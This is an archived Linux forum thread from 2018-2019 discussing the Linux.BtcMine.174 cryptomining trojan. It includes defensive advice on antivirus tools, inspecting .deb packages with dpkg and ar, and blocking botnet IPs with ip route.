This is a static archive of the old Zorin Forum.

The information below may be outdated. Visit the new Zorin Forum here ›

If you have registered on the old forum, you will need to create an account on the new forum.

New linux Malware on the Block!

Swarfendor437

Tue Nov 27, 2018 8:23:19 pm

https://www.theinquirer.net/inquirer/ne ... -standards

This is a new malware on the block - only made aware of it by visiting Spatry's Cup of Linux website. What is interesting is that this malware also contains a rootkit so intersting to see how rkhunter and chkrootkit, LMD, ClamAV respond to this threat. Having read the article, clamd is affected which is the daemon that runs in conjunction with ClamAV. A forum member on CupOfLinux has suggested Sophos for Linux is one of the few AVs not affected. Spatry states that BitDefender for Linux is the better solution as it is free, you just have to provide an email address and renew each year. It's a crypto currency hunter hunting monoware. Lynis might also be worth considering from the writer of rkhunter. Unlike rkhunter, Lynis looks at weaknesses in a system and suggests hardening areas where there are potential weaknesses. Take care out there!

lat002

Wed Dec 19, 2018 8:52:48 pm

Swarfendor437,
This malware is a worry to me still being a raw newbie on Zorin. Many things that I read about on the forums demonstrate the vast knowledge that is out there in the Linux community which can seem daunting. I am more comfortable with Windows where I rely on real time anti-virus (etc) protection (with annual subscription) to keep me safe.
I have just Googled "linux real time av protection" and got this hit: https://forums.fedoraforum.org/showthre ... ic-update-!
This discusses 'LINUX MALWARE DETECT' which looks like a promising defence against 'Linux.BtcMine.174' providing it is updated to detect that malware and is available on Zorin. I would much appreciate your expert comments please.

zorinantwerp

Wed Dec 19, 2018 9:34:24 pm

Hi
useful comments if it fits your user profile
Code:
ttps://www.reddit.com/r/linux/comments/a0kuqx/the_linuxbtcmine174_trojan_anyone_know_its_attack/


+++

Swarfendor437

Wed Dec 19, 2018 11:40:48 pm

In the scale of things, this is more worrying!:

https://www.washingtonpost.com/business ... 2a96d98332

Also, just like most road traffic accidents happen as a result of the "...nut behind the wheel", most hacks take place due to the "...fingers on the keyboard and eyes not observing what is happening when browsing:

https://www.thesslstore.com/blog/5-ways ... or-a-scam/

Also check any third party app you download that might be tarballed:

"Inspect 3rd Party .deb packages before installing: These should always be inspected before 'extracting' as whilst not a virus, malicious code could be lurking there:
"I always open the debs and check for suspicious post-install scripts
This is how to do that. ...
Listing the files from a debian package using dpkg -c
dpkg is the package manager for debian. So using dpkg command you can list and extract the packages, as shown below.
To view the content of *.deb file:
Code:
:
$ dpkg -c ovpc_1.06.94-3_i386.deb
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/lib/
dr-xr-xr-x root/root 0 2010-02-25 10:48 ./ovpc/pkg/lib/header/
-r-xr-xr-x root/root 130 2009-10-29 17:06 ./ovpc/pkg/lib/header/libov.so
.
.
.
-r-xr-xr-x root/root 131 2009-10-29 17:06 ./ovpc/pkg/etc/conf
dr-xr-xr-x root/root 0 2010-02-25 10:54 ./ovpc/pkg/etc/conf/log.conf
Extracting the files from a debian package using dpkg -x
Use dpkg -x to extract the files from a deb package as shown below.
Code:
:
$ dpkg -x ovpc_1.06.94-3_i386.deb /tmp/ov
$ ls /tmp/ov
ovpc
DEB files are ar archives, which always contains the three files — debian-binary, control.tar.gz, and data.tar.gz. We can use ar command and tar command to extract and view the files from the deb package, as shown below.
First, extract the content of *.deb archive file using ar command.
Code:
:
$ ar -vx ovpc_1.06.94-3_i386.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz
$
Next, extract the content of data.tar.gz file as shown below.
Code: : $ tar -xvzf data.tar.gz
./
./ovpc/
./ovpc/pkg/
./ovpc/pkg/lib/
./ovpc/pkg/lib/header/
./ovpc/pkg/lib/header/libov.so
.
.
./ovpc/pkg/etc/conf
./ovpc/pkg/etc/conf/log.con " [With acknowledgement to Blackwolf on ultimateeditionoz.com forum – sadly the forum is no more]. There was an instance of a GNU/Linux theme uploaded to gnome-look.org called Ubundows that had not been checked by Admin for that site; the file once extracted executed 'Unix' commands to wipe the hard drive clean of all content - YOU HAVE BEEN WARNED!"

terry

Thu Dec 27, 2018 6:25:37 pm

1,000 lines of code that's pretty long, it will really do some damage / headache on SysAd, thanks for the post I'll keep and eye on this hope this can be fixed soon.

poojagite

Fri Feb 08, 2019 8:51:05 am

1 botnet used IP address ONLY (unusual as ICANN sinkholes those fast & I've seen an 'uptick' in it lately - perhaps hosts IS making a 'dent' in 'badguys': For that - you need a firewall block rule OR wait out ICANN).

No, you can easily block individual addresses through the routing table.
ip route add prohibit N.N.N.N
This works with networks too, like:
ip route add prohibit 185.224.136.0/23

If you have all of the nasties in a file, you can do something like this at startup, in an rc.local file or similar:
xargs -r -n1 </etc/ipblocklist ip route add prohibit

Also, while I have you here, many modern distros default to prefer DNS over /etc/hosts and only use /etc/hosts as a fallback, in which case your /etc/hosts list will not have any effect unless /etc/nsswitch.conf is modified.

Example line in /etc/nsswitch.conf that will not work:
hosts: dns [!UNAVAIL=return] files
Example line in /etc/nsswitch.conf that will work:
hosts: files dns
Its a hardware error.